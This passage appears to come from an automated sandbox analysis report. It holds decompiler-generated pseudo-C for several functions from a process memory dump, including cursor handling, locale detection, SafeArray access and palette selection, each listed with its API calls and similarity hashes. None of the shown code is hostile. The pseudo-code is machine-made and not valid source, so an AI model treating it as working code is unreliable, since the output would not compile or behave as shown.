                                  				if( *0x4a0130 == 0) {
                                  					 *0x4a0130 = E004093EC;
                                  					return E004093EC;
                                  				}
                                  				return _t1;
                                  			}

                                  APIs
                                  • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040EE8D,00000000,0040EEA0), ref: 0040E3CA
                                  • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA,kernel32.dll,?,0040EE8D,00000000,0040EEA0), ref: 0040E3DB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: AddressHandleModuleProc
                                  • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                  • API String ID: 1646373207-3712701948
                                  • Opcode ID: 3297197142e193b8ee51b06a66e1645ebf4d4f92996ebf909e442d7c203a4103
                                  • Instruction ID: e471eca2aa7091ab47a2834240f2a968c57268bd2a669ffe9bc7cf51e754e08f
                                  • Opcode Fuzzy Hash: 3297197142e193b8ee51b06a66e1645ebf4d4f92996ebf909e442d7c203a4103
                                  • Instruction Fuzzy Hash: 89D05EB02003119AD7016BA258D568A3ED8A301304F00193BBC41B72C2D77D4820C61D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 92%
                                  			E00444C2C(intOrPtr* __eax, signed int __edx) {
                                  				intOrPtr _v16;
                                  				char _v20;
                                  				char _v24;
                                  				char _v28;
                                  				intOrPtr _t49;
                                  				intOrPtr _t53;
                                  				intOrPtr _t54;
                                  				intOrPtr _t55;
                                  				intOrPtr _t56;
                                  				intOrPtr* _t60;
                                  				intOrPtr* _t62;
                                  				struct HICON__* _t65;
                                  				intOrPtr _t67;
                                  				intOrPtr* _t72;
                                  				intOrPtr _t74;
                                  				intOrPtr* _t75;
                                  				intOrPtr _t78;
                                  				intOrPtr _t80;
                                  				intOrPtr _t82;
                                  				intOrPtr _t84;
                                  				intOrPtr _t85;
                                  				struct HWND__* _t88;
                                  				intOrPtr _t89;
                                  				intOrPtr _t91;
                                  				intOrPtr* _t93;
                                  				intOrPtr _t97;
                                  				intOrPtr _t100;
                                  				intOrPtr _t102;
                                  				intOrPtr _t103;
                                  				intOrPtr _t104;
                                  				intOrPtr _t106;
                                  				struct HWND__* _t107;
                                  				intOrPtr _t108;
                                  				intOrPtr _t110;
                                  				intOrPtr _t114;
                                  				intOrPtr _t117;
                                  				char _t118;
                                  				intOrPtr _t119;
                                  				void* _t131;
                                  				intOrPtr _t135;
                                  				intOrPtr _t140;
                                  				intOrPtr* _t155;
                                  				void* _t158;
                                  				void* _t165;
                                  				void* _t166;
                                  
                                  				_t155 = __eax;
                                  				if( *0x4bcb18 != 0) {
                                  					L3:
                                  					_t49 =  *0x4bcaf8; // 0x0
                                  					_t117 = E00444AF8(_t155,  &_v28, _t49);
                                  					if( *0x4bcb18 == 0) {
                                  						_t168 =  *0x4bcb1c;
                                  						if( *0x4bcb1c != 0) {
                                  							_t106 =  *0x4bcb0c; // 0x0
                                  							_t107 = GetDesktopWindow();
                                  							_t108 =  *0x4bcb1c; // 0x0
                                  							E0044F0B4(_t108, _t107, _t168, _t106);
                                  						}
                                  					}
                                  					_t53 =  *0x4bcaf8; // 0x0
                                  					if( *((char*)(_t53 + 0x9b)) != 0) {
                                  						__eflags =  *0x4bcb18;
                                  						_t6 =  &_v24;
                                  						 *_t6 =  *0x4bcb18 != 0;
                                  						__eflags =  *_t6;
                                  						 *0x4bcb18 = 2;
                                  					} else {
                                  						 *0x4bcb18 = 1;
                                  						_v24 = 0;
                                  					}
                                  					_t54 =  *0x4bcafc; // 0x0
                                  					if(_t117 ==  *((intOrPtr*)(_t54 + 4))) {
                                  						L12:
                                  						_t55 =  *0x4bcafc; // 0x0
                                  						 *((intOrPtr*)(_t55 + 0xc)) =  *_t155;
                                  						 *((intOrPtr*)(_t55 + 0x10)) =  *((intOrPtr*)(_t155 + 4));
                                  						_t56 =  *0x4bcafc; // 0x0
                                  						if( *((intOrPtr*)(_t56 + 4)) != 0) {
                                  							_t97 =  *0x4bcafc; // 0x0
                                  							E00446888( *((intOrPtr*)(_t97 + 4)),  &_v20, _t155);
                                  							_t100 =  *0x4bcafc; // 0x0
                                  							 *((intOrPtr*)(_t100 + 0x14)) = _v20;
                                  							 *((intOrPtr*)(_t100 + 0x18)) = _v16;
                                  						}
                                  						_t131 = E00444B50(2);
                                  						_t121 =  *_t155;
                                  						_t60 =  *0x4bcafc; // 0x0
                                  						_t158 =  *((intOrPtr*)( *_t60 + 4))( *((intOrPtr*)(_t155 + 4)));
                                  						if( *0x4bcb1c != 0) {
                                  							if(_t117 == 0 || ( *(_t117 + 0x51) & 0x00000020) != 0) {
                                  								_t82 =  *0x4bcb1c; // 0x0
                                  								E0044F070(_t82, _t158);
                                  								_t84 =  *0x4bcb1c; // 0x0
                                  								_t177 =  *((char*)(_t84 + 0x6a));
                                  								if( *((char*)(_t84 + 0x6a)) != 0) {
                                  									_t121 =  *((intOrPtr*)(_t155 + 4));
                                  									_t85 =  *0x4bcb1c; // 0x0
                                  									E0044F19C(_t85,  *((intOrPtr*)(_t155 + 4)),  *_t155, __eflags);
                                  								} else {
                                  									_t88 = GetDesktopWindow();
                                  									_t121 =  *_t155;
                                  									_t89 =  *0x4bcb1c; // 0x0
                                  									E0044F0B4(_t89, _t88, _t177,  *((intOrPtr*)(_t155 + 4)));
                                  								}
                                  							} else {
                                  								_t91 =  *0x4bcb1c; // 0x0
                                  								E0044F210(_t91, _t131, __eflags);
                                  								_t93 =  *0x4bb224; // 0x4bcb80
                                  								SetCursor(E004653CC( *_t93, _t121, _t158));
                                  							}
                                  						}
                                  						_t62 =  *0x4bb224; // 0x4bcb80
                                  						_t65 = SetCursor(E004653CC( *_t62, _t121, _t158));
                                  						if( *0x4bcb18 != 2) {
                                  							L32:
                                  							return _t65;
                                  						} else {
                                  							_t179 = _t117;
                                  							if(_t117 != 0) {
                                  								_t118 = E00444B8C();
                                  								_t67 =  *0x4bcafc; // 0x0
                                  								 *((intOrPtr*)(_t67 + 0x58)) = _t118;
                                  								__eflags = _t118;
                                  								if(__eflags != 0) {
                                  									E00446888(_t118,  &_v24, _t155);
                                  									_t65 = E00403814(_t118, __eflags);
                                  									_t135 =  *0x4bcafc; // 0x0
                                  									 *(_t135 + 0x54) = _t65;
                                  								} else {
                                  									_t78 =  *0x4bcafc; // 0x0
                                  									_t65 = E00403814( *((intOrPtr*)(_t78 + 4)), __eflags);
                                  									_t140 =  *0x4bcafc; // 0x0
                                  									 *(_t140 + 0x54) = _t65;
                                  								}
                                  							} else {
                                  								_push( *((intOrPtr*)(_t155 + 4)));
                                  								_t80 =  *0x4bcafc; // 0x0
                                  								_t65 = E00403814( *((intOrPtr*)(_t80 + 0x38)), _t179);
                                  							}
                                  							if( *0x4bcafc == 0) {
                                  								goto L32;
                                  							} else {
                                  								_t119 =  *0x4bcafc; // 0x0
                                  								_t41 = _t119 + 0x5c; // 0x5c
                                  								_t42 = _t119 + 0x44; // 0x44
                                  								_t65 = E00408928(_t42, 0x10, _t41);
                                  								if(_t65 != 0) {
                                  									goto L32;
                                  								}
                                  								if(_v28 != 0) {
                                  									_t75 =  *0x4bcafc; // 0x0
                                  									 *((intOrPtr*)( *_t75 + 0x34))();
                                  								}
                                  								_t72 =  *0x4bcafc; // 0x0
                                  								 *((intOrPtr*)( *_t72 + 0x30))();
                                  								_t74 =  *0x4bcafc; // 0x0
                                  								asm("movsd");
                                  								asm("movsd");
                                  								asm("movsd");
                                  								asm("movsd");
                                  								return _t74;
                                  							}
                                  						}
                                  					}
                                  					_t65 = E00444B50(1);
                                  					if( *0x4bcafc == 0) {
                                  						goto L32;
                                  					}
                                  					_t102 =  *0x4bcafc; // 0x0
                                  					 *((intOrPtr*)(_t102 + 4)) = _t117;
                                  					_t103 =  *0x4bcafc; // 0x0
                                  					 *((intOrPtr*)(_t103 + 8)) = _v28;
                                  					_t104 =  *0x4bcafc; // 0x0
                                  					 *((intOrPtr*)(_t104 + 0xc)) =  *_t155;
                                  					 *((intOrPtr*)(_t104 + 0x10)) =  *((intOrPtr*)(_t155 + 4));
                                  					_t65 = E00444B50(0);
                                  					if( *0x4bcafc == 0) {
                                  						goto L32;
                                  					}
                                  					goto L12;
                                  				}
                                  				_t110 =  *0x4bcb08; // 0x0
                                  				asm("cdq");
                                  				_t165 = (_t110 -  *__eax ^ __edx) - __edx -  *0x4bcb14; // 0x0
                                  				if(_t165 >= 0) {
                                  					goto L3;
                                  				}
                                  				_t114 =  *0x4bcb0c; // 0x0
                                  				asm("cdq");
                                  				_t65 = (_t114 -  *((intOrPtr*)(__eax + 4)) ^ __edx) - __edx;
                                  				_t166 = _t65 -  *0x4bcb14; // 0x0
                                  				if(_t166 < 0) {
                                  					goto L32;
                                  				}
                                  				goto L3;
                                  			}

















































                                  APIs
                                  • GetDesktopWindow.USER32 ref: 00444CA0
                                  • GetDesktopWindow.USER32 ref: 00444DC5
                                  • SetCursor.USER32(00000000), ref: 00444E1A
                                    • Part of subcall function 0044F210: 73F65F2B.COMCTL32(00000000,?,00444DF5), ref: 0044F22C
                                    • Part of subcall function 0044F210: ShowCursor.USER32 ref: 0044F247
                                  • SetCursor.USER32(00000000), ref: 00444E05
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: Cursor$DesktopWindow$Show
                                  • String ID:
                                  • API String ID: 110329033-0
                                  • Opcode ID: 7e4f390cbc5c25a53cd77a3144c6afc00e5398946b701fc3d3fab7b1bc504652
                                  • Instruction ID: 475d32836423a9bd19355cb9e1264fc100bba4ff6c086f2094e3e4f87640bfd2
                                  • Opcode Fuzzy Hash: 7e4f390cbc5c25a53cd77a3144c6afc00e5398946b701fc3d3fab7b1bc504652
                                  • Instruction Fuzzy Hash: 8C919F75604246CFD314DF2AE8C5B0AB7E1BB89308F14C27AE844977A6C778EC45CB99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 66%
                                  			E0043B820(intOrPtr* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
                                  				char _v5;
                                  				long _v12;
                                  				char _v13;
                                  				char _v20;
                                  				char _v24;
                                  				char _v28;
                                  				char _v32;
                                  				void* _t35;
                                  				long _t37;
                                  				void* _t47;
                                  				void* _t67;
                                  				void* _t68;
                                  				long _t80;
                                  				void* _t85;
                                  				intOrPtr* _t95;
                                  				intOrPtr _t106;
                                  				void* _t123;
                                  				intOrPtr _t129;
                                  
                                  				_push(0);
                                  				_push(0);
                                  				_push(0);
                                  				_push(0);
                                  				_push(0);
                                  				_push(0);
                                  				_push(0);
                                  				_t123 = __edx;
                                  				_t95 = __eax;
                                  				_push(_t129);
                                  				_push(0x43b9d5);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t129;
                                  				_t35 = E00404698(__edx);
                                  				_t130 = _t35;
                                  				if(_t35 != 0) {
                                  					_t37 = E00404898(__edx);
                                  					_v12 = SendMessageA(E0044D590(_t95), 0x14c, 0xffffffff, _t37);
                                  					__eflags = _v12 - 0xffffffff;
                                  					_v5 = _v12 != 0xffffffff;
                                  					__eflags = _v5;
                                  					if(_v5 != 0) {
                                  						_t47 =  *((intOrPtr*)( *_t95 + 0xcc))();
                                  						__eflags = _t47 - _v12;
                                  						_v13 = _t47 != _v12;
                                  						__eflags =  *((char*)(_t95 + 0x290));
                                  						if( *((char*)(_t95 + 0x290)) != 0) {
                                  							_t85 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t95 + 0x23c)))) + 0x54))();
                                  							__eflags = _t85 + 1;
                                  							if(_t85 + 1 != 0) {
                                  								SendMessageA(E0044D590(_t95), 0x14f, 0, 0);
                                  							}
                                  						}
                                  						SendMessageA(E0044D590(_t95), 0x14e, _v12, 0);
                                  						__eflags =  *((intOrPtr*)(_t95 + 0x276)) - 2;
                                  						if( *((intOrPtr*)(_t95 + 0x276)) - 2 >= 0) {
                                  							 *((intOrPtr*)( *_t95 + 0xd0))();
                                  							E0040442C(_t95 + 0x270, _t123);
                                  						} else {
                                  							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t95 + 0x23c)))) + 0xc))( &_v24);
                                  							_push(_v28);
                                  							_t67 = E00404698(_t123);
                                  							_pop(_t68);
                                  							E004048F8(_t68, 0x7fffffff, _t67 + 1);
                                  							E004046E4( &_v20, _v24, _t123);
                                  							E00446D74(_t95, _t95, _v20, _t123);
                                  							E00446D44(_t95,  &_v32);
                                  							_push(E00404698(_v32));
                                  							E00404698(_t123);
                                  							_t80 = E004075BC();
                                  							SendMessageA(E0044D590(_t95), 0x142, 0, _t80);
                                  						}
                                  						__eflags = _v13;
                                  						if(__eflags != 0) {
                                  							E00403814(_t95, __eflags);
                                  							E00403814(_t95, __eflags);
                                  						}
                                  					}
                                  				} else {
                                  					_v5 = 0;
                                  					 *((intOrPtr*)( *_t95 + 0xd0))();
                                  					E00403814(_t95, _t130);
                                  				}
                                  				_pop(_t106);
                                  				 *[fs:eax] = _t106;
                                  				_push(0x43b9dc);
                                  				E004043D8( &_v32);
                                  				return E004043FC( &_v28, 3);
                                  			}






















                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: MessageSend
                                  • String ID:
                                  • API String ID: 3850602802-0
                                  • Opcode ID: 5a38a1f5d8e0d92f452b63e7d7d64a10a33b3cb3e6b89bd11972649407dc2a24
                                  • Instruction ID: a3799fd380f08caab525c12342252af6b461e83baef9da14bd1fb1378edc882a
                                  • Opcode Fuzzy Hash: 5a38a1f5d8e0d92f452b63e7d7d64a10a33b3cb3e6b89bd11972649407dc2a24
                                  • Instruction Fuzzy Hash: 84418670B042445BDB00FB7ACC46B9EB7A9AF49314F10457AB914EB2C2DB7C9D06C7A9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 82%
                                  			E00410530(intOrPtr* __eax) {
                                  				char _v260;
                                  				char _v768;
                                  				char _v772;
                                  				intOrPtr* _v776;
                                  				signed short* _v780;
                                  				char _v784;
                                  				signed int _v788;
                                  				char _v792;
                                  				intOrPtr* _v796;
                                  				signed char _t43;
                                  				intOrPtr* _t60;
                                  				void* _t79;
                                  				void* _t81;
                                  				void* _t84;
                                  				void* _t85;
                                  				intOrPtr* _t92;
                                  				void* _t96;
                                  				char* _t97;
                                  				void* _t98;
                                  
                                  				_v776 = __eax;
                                  				if(( *(_v776 + 1) & 0x00000020) == 0) {
                                  					E00410378(0x80070057);
                                  				}
                                  				_t43 =  *_v776;
                                  				if((_t43 & 0x00000fff) == 0xc) {
                                  					if((_t43 & 0x00000040) == 0) {
                                  						_v780 =  *((intOrPtr*)(_v776 + 8));
                                  					} else {
                                  						_v780 =  *((intOrPtr*)( *((intOrPtr*)(_v776 + 8))));
                                  					}
                                  					_v788 =  *_v780 & 0x0000ffff;
                                  					_t79 = _v788 - 1;
                                  					if(_t79 >= 0) {
                                  						_t85 = _t79 + 1;
                                  						_t96 = 0;
                                  						_t97 =  &_v772;
                                  						do {
                                  							_v796 = _t97;
                                  							_push(_v796 + 4);
                                  							_t22 = _t96 + 1; // 0x1
                                  							_push(_v780);
                                  							L0040F32C();
                                  							E00410378(_v780);
                                  							_push( &_v784);
                                  							_t25 = _t96 + 1; // 0x1
                                  							_push(_v780);
                                  							L0040F334();
                                  							E00410378(_v780);
                                  							 *_v796 = _v784 -  *((intOrPtr*)(_v796 + 4)) + 1;
                                  							_t96 = _t96 + 1;
                                  							_t97 = _t97 + 8;
                                  							_t85 = _t85 - 1;
                                  						} while (_t85 != 0);
                                  					}
                                  					_t81 = _v788 - 1;
                                  					if(_t81 >= 0) {
                                  						_t84 = _t81 + 1;
                                  						_t60 =  &_v768;
                                  						_t92 =  &_v260;
                                  						do {
                                  							 *_t92 =  *_t60;
                                  							_t92 = _t92 + 4;
                                  							_t60 = _t60 + 8;
                                  							_t84 = _t84 - 1;
                                  						} while (_t84 != 0);
                                  						do {
                                  							goto L12;
                                  						} while (E004104D4(_t83, _t98) != 0);
                                  						goto L15;
                                  					}
                                  					L12:
                                  					_t83 = _v788 - 1;
                                  					if(E004104A4(_v788 - 1, _t98) != 0) {
                                  						_push( &_v792);
                                  						_push( &_v260);
                                  						_push(_v780);
                                  						L0040F35C();
                                  						E00410378(_v780);
                                  						E00410728(_v792);
                                  					}
                                  				}
                                  				L15:
                                  				_push(_v776);
                                  				L0040EEC0();
                                  				return E00410378(_v776);
                                  			}























                                  APIs
                                  • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 004105DF
                                  • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 004105FB
                                  • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 00410672
                                  • VariantClear.OLEAUT32(?), ref: 0041069B
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: ArraySafe$Bound$ClearIndexVariant
                                  • String ID:
                                  • API String ID: 920484758-0
                                  • Opcode ID: 00a0bc35264b4ba4ffeced68f91cb7649706495595b5674ac2242a0ee5001928
                                  • Instruction ID: 283d48e68f5a76c8e070f7de73831700d310a02d59f076832b492f97b2296d6e
                                  • Opcode Fuzzy Hash: 00a0bc35264b4ba4ffeced68f91cb7649706495595b5674ac2242a0ee5001928
                                  • Instruction Fuzzy Hash: FF413C75A0121D9FCB61DB59C880BC9B3FCAF48314F0041EAE548E7212DA78AFC08F54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040DB0C() {
                                  				char* _v28;
                                  				char _v156;
                                  				short _v414;
                                  				signed short _t16;
                                  				signed int _t18;
                                  				int _t20;
                                  				void* _t22;
                                  				void* _t25;
                                  				int _t26;
                                  				int _t30;
                                  				signed int _t34;
                                  				signed int _t35;
                                  				signed int _t36;
                                  				signed int _t41;
                                  				int* _t43;
                                  				short* _t44;
                                  				void* _t52;
                                  
                                  				 *0x4bc744 = 0x409;
                                  				 *0x4bc748 = 9;
                                  				 *0x4bc74c = 1;
                                  				_t16 = GetThreadLocale();
                                  				if(_t16 != 0) {
                                  					 *0x4bc744 = _t16;
                                  				}
                                  				if(_t16 != 0) {
                                  					 *0x4bc748 = _t16 & 0x3ff;
                                  					 *0x4bc74c = (_t16 & 0x0000ffff) >> 0xa;
                                  				}
                                  				memcpy(0x4a010c, 0x40dc64, 8 << 2);
                                  				if( *0x4a00c4 != 2) {
                                  					_t18 = GetSystemMetrics(0x4a);
                                  					__eflags = _t18;
                                  					 *0x4bc751 = _t18 & 0xffffff00 | _t18 != 0x00000000;
                                  					_t20 = GetSystemMetrics(0x2a);
                                  					__eflags = _t20;
                                  					_t35 = _t34 & 0xffffff00 | _t20 != 0x00000000;
                                  					 *0x4bc750 = _t35;
                                  					__eflags = _t35;
                                  					if(__eflags != 0) {
                                  						return E0040DA94(__eflags, _t52);
                                  					}
                                  				} else {
                                  					_t22 = E0040DAF4();
                                  					if(_t22 != 0) {
                                  						 *0x4bc751 = 0;
                                  						 *0x4bc750 = 0;
                                  						return _t22;
                                  					}
                                  					E0040DA94(__eflags, _t52);
                                  					_t41 = 0x20;
                                  					_t25 = E00403140(0x4a010c, 0x20, 0x40dc64);
                                  					_t36 = _t34 & 0xffffff00 | __eflags != 0x00000000;
                                  					 *0x4bc750 = _t36;
                                  					__eflags = _t36;
                                  					if(_t36 != 0) {
                                  						 *0x4bc751 = 0;
                                  						return _t25;
                                  					}
                                  					_t26 = 0x80;
                                  					_t43 =  &_v156;
                                  					do {
                                  						 *_t43 = _t26;
                                  						_t26 = _t26 + 1;
                                  						_t43 =  &(_t43[0]);
                                  						__eflags = _t26 - 0x100;
                                  					} while (_t26 != 0x100);
                                  					_v28 =  &_v156;
                                  					_t30 =  *0x4bc744; // 0x409
                                  					GetStringTypeA(_t30, 2, _v28, 0x80,  &_v414);
                                  					_t20 = 0x80;
                                  					_t44 =  &_v414;
                                  					while(1) {
                                  						__eflags =  *_t44 - 2;
                                  						_t41 = _t41 & 0xffffff00 |  *_t44 == 0x00000002;
                                  						 *0x4bc751 = _t41;
                                  						__eflags = _t41;
                                  						if(_t41 != 0) {
                                  							goto L17;
                                  						}
                                  						_t44 = _t44 + 2;
                                  						_t20 = _t20 - 1;
                                  						__eflags = _t20;
                                  						if(_t20 != 0) {
                                  							continue;
                                  						} else {
                                  							return _t20;
                                  						}
                                  						L18:
                                  					}
                                  				}
                                  				L17:
                                  				return _t20;
                                  				goto L18;
                                  			}

                                  APIs
                                  • GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 0040DC06
                                  • GetThreadLocale.KERNEL32 ref: 0040DB36
                                    • Part of subcall function 0040DA94: GetCPInfo.KERNEL32(00000000,?), ref: 0040DAAD
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: InfoLocaleStringThreadType
                                  • String ID:
                                  • API String ID: 1505017576-0
                                  • Opcode ID: f85920185e767f2d17ba52d190d1d5b2c589a46a06caf4990fc8c9e9a7a4a679
                                  • Instruction ID: 7dfe8f0be98327da7fd701f5855bbdcde48a39931a3816f4e7dd18806b9bfddd
                                  • Opcode Fuzzy Hash: f85920185e767f2d17ba52d190d1d5b2c589a46a06caf4990fc8c9e9a7a4a679
                                  • Instruction Fuzzy Hash: CF312D21D483868BE710DBA99CC17A63794EB42304F1441BBE544AB3C6DFBC484DCB5E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 75%
                                  			E0042C758(intOrPtr __eax, void* __edx) {
                                  				intOrPtr _v8;
                                  				void* __ebx;
                                  				void* __ecx;
                                  				void* __esi;
                                  				void* __ebp;
                                  				intOrPtr _t33;
                                  				intOrPtr _t59;
                                  				struct HDC__* _t69;
                                  				void* _t70;
                                  				intOrPtr _t79;
                                  				void* _t84;
                                  				struct HPALETTE__* _t85;
                                  				intOrPtr _t87;
                                  				intOrPtr _t89;
                                  
                                  				_t87 = _t89;
                                  				_push(_t70);
                                  				_v8 = __eax;
                                  				_t33 = _v8;
                                  				if( *((intOrPtr*)(_t33 + 0x58)) == 0) {
                                  					return _t33;
                                  				} else {
                                  					E004290B8(_v8);
                                  					_push(_t87);
                                  					_push(0x42c837);
                                  					_push( *[fs:eax]);
                                  					 *[fs:eax] = _t89;
                                  					E0042DB68( *((intOrPtr*)(_v8 + 0x58)));
                                  					E0042C5D4( *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 8));
                                  					E0042DC68( *((intOrPtr*)(_v8 + 0x58)));
                                  					_t69 = CreateCompatibleDC(0);
                                  					_t84 =  *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 8);
                                  					if(_t84 == 0) {
                                  						 *((intOrPtr*)(_v8 + 0x5c)) = 0;
                                  					} else {
                                  						 *((intOrPtr*)(_v8 + 0x5c)) = SelectObject(_t69, _t84);
                                  					}
                                  					_t85 =  *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 0x10);
                                  					if(_t85 == 0) {
                                  						 *((intOrPtr*)(_v8 + 0x60)) = 0;
                                  					} else {
                                  						 *((intOrPtr*)(_v8 + 0x60)) = SelectPalette(_t69, _t85, 0xffffffff);
                                  						RealizePalette(_t69);
                                  					}
                                  					E0042955C(_v8, _t69);
                                  					_t59 =  *0x4a08b8; // 0x1c40ae8
                                  					E0041CB94(_t59, _t69, _t70, _v8, _t85);
                                  					_pop(_t79);
                                  					 *[fs:eax] = _t79;
                                  					_push(0x42c83e);
                                  					return E004293B0(_v8);
                                  				}
                                  			}

                                  APIs
                                    • Part of subcall function 004290B8: RtlEnterCriticalSection.KERNEL32(004BC8C4,00000000,00427B22,00000000,00427B81), ref: 004290C0
                                    • Part of subcall function 004290B8: RtlLeaveCriticalSection.KERNEL32(004BC8C4,004BC8C4,00000000,00427B22,00000000,00427B81), ref: 004290CD
                                    • Part of subcall function 004290B8: RtlEnterCriticalSection.KERNEL32(00000038,004BC8C4,004BC8C4,00000000,00427B22,00000000,00427B81), ref: 004290D6
                                    • Part of subcall function 0042DC68: GetDC.USER32(00000000), ref: 0042DCBE
                                    • Part of subcall function 0042DC68: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0042DCD3
                                    • Part of subcall function 0042DC68: GetDeviceCaps.GDI32(00000000,0000000E), ref: 0042DCDD
                                    • Part of subcall function 0042DC68: CreateHalftonePalette.GDI32(00000000), ref: 0042DD01
                                    • Part of subcall function 0042DC68: ReleaseDC.USER32(00000000,00000000), ref: 0042DD0C
                                  • CreateCompatibleDC.GDI32(00000000), ref: 0042C7AD
                                  • SelectObject.GDI32(00000000,?), ref: 0042C7C6
                                  • SelectPalette.GDI32(00000000,?,000000FF), ref: 0042C7EF
                                  • RealizePalette.GDI32(00000000), ref: 0042C7FB
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: CriticalPaletteSection$CapsCreateDeviceEnterSelect$CompatibleHalftoneLeaveObjectRealizeRelease
                                  • String ID:
                                  • API String ID: 979337279-0
                                  • Opcode ID: c291bec3cf8fd50d14d991b0c1a51525f64be2406a20fc89d9e7138dea2ecfb9
                                  • Instruction ID: 86336aa842a4a3c1bb486defafc39bd931e9607337606b8e8b9f822ac2bc106b
                                  • Opcode Fuzzy Hash: c291bec3cf8fd50d14d991b0c1a51525f64be2406a20fc89d9e7138dea2ecfb9
                                  • Instruction Fuzzy Hash: CB31F474B04664EFD704EB59D981D5DB3F5EF48310BA241A6E804AB362C738EE41DB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 53%
                                  			E0049C120(void* __eax, void* __ebx, int __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, char _a12) {
                                  				struct tagRECT _v20;
                                  				int _t30;
                                  				int _t43;
                                  				void* _t51;
                                  				intOrPtr _t58;
                                  				CHAR* _t61;
                                  				int _t64;
                                  				void* _t67;
                                  
                                  				asm("movsd");
                                  				asm("movsd");
                                  				asm("movsd");
                                  				asm("movsd");
                                  				_t64 = __ecx;
                                  				_t51 = __eax;
                                  				E00404888(_a12);
                                  				_push(_t67);
                                  				_push(0x49c1e8);
                                  				_push( *[fs:eax]);
